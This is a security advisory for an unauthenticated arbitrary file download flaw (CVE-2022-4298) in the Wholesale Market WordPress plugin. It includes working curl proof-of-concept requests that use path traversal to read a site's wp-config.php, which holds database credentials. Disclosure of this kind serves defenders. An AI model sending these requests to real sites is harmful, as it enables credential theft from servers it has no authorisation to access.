Wholesale Market < 2.2.1 – Unauthenticated Arbitrary File Download | CVE 2022-4298

Description

The plugin does not have authorisation check, as well as does not validate user input used to generate system path, allowing unauthenticated attackers to download arbitrary file from the server.

Proof of Concept

1. Install woocommerce (dependency, no setup required)
2. Install the vulnerable plugin (wholesale-market)
3. Invoke the following curl command to ensure the required uploads directory exists:
   (This creates /var/www/html/wp-content/uploads/wholesale_market_import_error/)

curl -i 'http://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_read_csv'

4. Invoke the following curl command to disclose the contents of the wp-config.php file:

curl -i 'https://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin&section=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php'